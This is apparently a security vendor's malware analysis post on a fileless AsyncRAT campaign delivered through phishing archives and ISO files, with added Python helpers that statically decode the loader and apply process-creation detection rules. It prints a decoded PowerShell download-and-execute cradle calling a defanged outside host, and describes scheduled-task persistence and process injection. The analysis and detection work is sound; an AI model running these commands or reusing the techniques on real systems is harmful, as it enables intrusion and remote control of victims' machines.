The ASEC analysis team has recently discovered that AsyncRAT malware is being distributed in fileless form. The distributed AsyncRAT is executed in fileless form through multiple script files and is thought to be delivered as a compressed file attachment in emails. AsyncRAT is an open-source RAT developed in .NET that can carry out various malicious activities on the attacker's command.
The compressed file distributed through phishing emails contains an HTML file; opening it writes the malicious data embedded in the HTML to disk as an ISO file. The ISO extension has been commonly used by various malware families in recent times.
The generated ISO file uses file names related to receipts and invoices, and the ISO file contains VBScript and bat files.
- File Name
The VBScript executes the bat file placed alongside it, and the bat file runs an obfuscated command.
The decoded command below launches a malicious PowerShell command through cmd. That PowerShell command in turn executes another PowerShell command hosted at a certain path.
- Decoded command
CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE];$XCZM='IEX(NEW-OBJECT NET.W';$SYWD='EBCLIENT).DOWNLO';[BYTE];$VFDR='TUUL("hxxps://aga12[.]ir/ico.png")'.REPLACE('TUUL','ADSTRING');[BYTE];IEX($XCZM+$SYWD+$VFDR)
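The command above hides its download cradle by splitting the string across three variables and swapping a placeholder token with .REPLACE before IEX concatenates them. The following Python script, added here as an analyst's helper and not part of the original post, statically rebuilds the string IEX would execute from such a variable chain, pulls out the DownloadString URL, and lists the stealth switches on the powershell.exe invocation. The sample input is transcribed from the decoded command in the post, with the URL left defanged exactly as printed there.

```python
import re

# Constructed sample, transcribed from the decoded command in the post
# (the URL is left defanged exactly as the post prints it).
DECODED_COMMAND = (
    "CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE];"
    "$XCZM='IEX(NEW-OBJECT NET.W';$SYWD='EBCLIENT).DOWNLO';[BYTE];"
    "$VFDR='TUUL(\"hxxps://aga12[.]ir/ico.png\")'.REPLACE('TUUL','ADSTRING');[BYTE];"
    "IEX($XCZM+$SYWD+$VFDR)"
)

# $NAME='literal' followed by zero or more .REPLACE('old','new') calls.
ASSIGN_RE = re.compile(
    r"\$(\w+)='((?:[^']|'')*)'((?:\.REPLACE\('[^']*','[^']*'\))*)", re.IGNORECASE)
REPLACE_RE = re.compile(r"\.REPLACE\('([^']*)','([^']*)'\)", re.IGNORECASE)
# IEX(...) whose argument is purely a '+' chain of variables. The literal
# "IEX(NEW-OBJECT" inside a string does not match because no '$' follows it.
IEX_RE = re.compile(r"IEX\(((?:\$\w+\+?)+)\)", re.IGNORECASE)
URL_RE = re.compile(r'DOWNLOADSTRING\("([^"]+)"\)', re.IGNORECASE)
LAUNCH_FLAGS = ("-NOP", "-WIND HIDDEN", "-EXEC BYPASS", "-NONI")


def resolve_variables(command):
    """Evaluate every $var='...'.REPLACE(...) assignment into its final string."""
    variables = {}
    for name, literal, replaces in ASSIGN_RE.findall(command):
        value = literal.replace("''", "'")           # PowerShell escapes ' as ''
        for old, new in REPLACE_RE.findall(replaces):
            value = value.replace(old, new)          # String.Replace is case-sensitive
        variables[name.upper()] = value              # PowerShell variable names are not
    return variables


def reconstruct_iex_payload(command):
    """Return the string IEX would execute, or None if no variable chain is found."""
    match = IEX_RE.search(command)
    if not match:
        return None
    variables = resolve_variables(command)
    parts = [p.lstrip("$").upper() for p in match.group(1).split("+") if p]
    return "".join(variables.get(p, "") for p in parts)


def extract_download_url(payload):
    """Pull the DownloadString argument (the stager URL) out of the rebuilt payload."""
    match = URL_RE.search(payload or "")
    return match.group(1) if match else None


def suspicious_launch_flags(command):
    """List the no-profile / hidden-window / bypass / non-interactive switches present."""
    upper = command.upper()
    return [flag for flag in LAUNCH_FLAGS if flag in upper]


if __name__ == "__main__":
    payload = reconstruct_iex_payload(DECODED_COMMAND)
    print("payload :", payload)
    print("url     :", extract_download_url(payload))
    print("flags   :", suspicious_launch_flags(DECODED_COMMAND))
```

Running the script prints the reassembled `IEX(NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING(...)` cradle together with the defanged URL, so the indicator can be blocked and hunted for without ever executing the command; the regexes only cover the literal-plus-.REPLACE pattern seen here, which is what makes a purely static rebuild safe.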
A portion of the additional PowerShell command is shown below; it generates a total of 5 script files and then executes them. The list below describes the role of each of the 5 generated scripts.
This is the first script file executed after the 5 scripts are generated. This script executes the file C:\ProgramData\Express\xx.bat generated alongside it.
This script registers the file C:\ProgramData\Express\Cotrl.vbs in the Task Scheduler. The registered task is set to run every 3 minutes.
This script executes the file C:\ProgramData\Express\Cotrl.vbs.
This script forcibly terminates the PowerShell process and executes the file C:\ProgramData\Express\Cotrl.ps1.
This script, which is the last to be executed, is the one that performs the actual malicious behavior. The script contains 2 pieces of malicious data: a Loader and AsyncRAT. The first piece, the Loader, is loaded and the Execute method of its GIT.local class is called, with the path "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" and the second piece of data (AsyncRAT) passed as arguments.
The Execute method of GIT.local is shown below; using the path and malicious data passed as arguments, it injects the malicious data into a legitimate process (C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe).
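Because nothing but scripts touches disk, the chain above is best caught on process telemetry: a script host spawning cmd.exe with a .bat, powershell.exe launched with hidden/bypass switches and a WebClient download cradle, a scheduled task with a very short repeat interval, and aspnet_compiler.exe being started by PowerShell. The following Python script, added here as a detection sketch and not code from the post or from AhnLab, runs those rules over constructed Sysmon Event ID 1-style records. The mounted-ISO drive letter, the script file names, the task name and the schtasks syntax are assumptions; the post does not state how the task is registered or which process launches aspnet_compiler.exe, so those parent/child pairs are also assumed.

```python
import ntpath
import re

# Constructed process-creation records modelled on the chain in the post.
# Drive letter, file names, task name and parent/child pairs are assumptions.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "E:\Invoice_0512.vbs"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c "E:\Invoice_0512.bat"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI '
                    'IEX(NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING("hxxps://aga12[.]ir/ico.png")'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 3 /tn Express '
                    r'/tr "wscript.exe C:\ProgramData\Express\Cotrl.vbs" /f'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"},
    # Benign noise (constructed): a build agent precompiling a site must not alert.
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "ParentImage": r"C:\BuildAgent\msbuild.exe",
     "CommandLine": r"aspnet_compiler.exe -v / -p C:\build\site -f C:\build\out"},
]

MAX_BENIGN_INTERVAL_MIN = 5   # anything repeating this often from a script is worth a look
SHELLS = ("powershell.exe", "pwsh.exe")


def _base(path):
    return ntpath.basename(path).lower()


def rule_script_host_spawns_batch(ev):
    return (_base(ev["ParentImage"]) in ("wscript.exe", "cscript.exe")
            and _base(ev["Image"]) == "cmd.exe"
            and ".bat" in ev["CommandLine"].lower())


def rule_powershell_hidden_bypass(ev):
    # -w/-wind/-windowstyle hidden together with -ex/-exec/-executionpolicy bypass
    cmd = ev["CommandLine"]
    return (_base(ev["Image"]) in SHELLS
            and re.search(r"-w\w*\s+hidden", cmd, re.I) is not None
            and re.search(r"-e\w*\s+bypass", cmd, re.I) is not None)


def rule_powershell_download_cradle(ev):
    cmd = ev["CommandLine"].lower()
    return (_base(ev["Image"]) in SHELLS
            and "net.webclient" in cmd
            and ("downloadstring" in cmd or "downloadfile" in cmd)
            and ("iex" in cmd or "invoke-expression" in cmd))


def rule_short_interval_scheduled_task(ev):
    cmd = ev["CommandLine"]
    if _base(ev["Image"]) != "schtasks.exe" or "/create" not in cmd.lower():
        return False
    minute = re.search(r"/sc\s+minute", cmd, re.I)
    modifier = re.search(r"/mo\s+(\d+)", cmd, re.I)
    interval = int(modifier.group(1)) if modifier else 1   # schtasks defaults /mo to 1
    in_programdata = "\\programdata\\" in cmd.lower()
    return minute is not None and (interval <= MAX_BENIGN_INTERVAL_MIN or in_programdata)


def rule_aspnet_compiler_from_powershell(ev):
    return (_base(ev["Image"]) == "aspnet_compiler.exe"
            and _base(ev["ParentImage"]) in SHELLS)


RULES = {
    "script_host_spawns_batch": rule_script_host_spawns_batch,
    "powershell_hidden_bypass": rule_powershell_hidden_bypass,
    "powershell_download_cradle": rule_powershell_download_cradle,
    "short_interval_scheduled_task": rule_short_interval_scheduled_task,
    "aspnet_compiler_from_powershell": rule_aspnet_compiler_from_powershell,
}


def scan(events):
    """Return (event_index, rule_name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for i, name in scan(SAMPLE_EVENTS):
        print(f"event {i}: {name} :: {SAMPLE_EVENTS[i]['CommandLine']}")
```

Each rule fires on exactly one stage of the chain and the legitimate build-agent use of aspnet_compiler.exe stays silent, which is the point of keying on the parent process rather than on the binary name alone; in practice the short-interval task rule would also be paired with Security event 4698 (task created) so that tasks registered through the COM API rather than schtasks.exe are not missed.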
The injected data is AsyncRAT, an open-source RAT published on GitHub. It receives commands from the attacker through the C2 server and can perform various malicious behaviors; most of these are carried out through plugins delivered by the attacker. The built-in features include Anti-VM, keylogging, and a remote shell.
There has been a recent increase in the distribution of malware through ISO files. Moreover, the malware is executed in fileless form, making it difficult for users to identify what type of malware was executed. Users should refrain from opening files from unknown sources and must run regular checkups on their PC.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.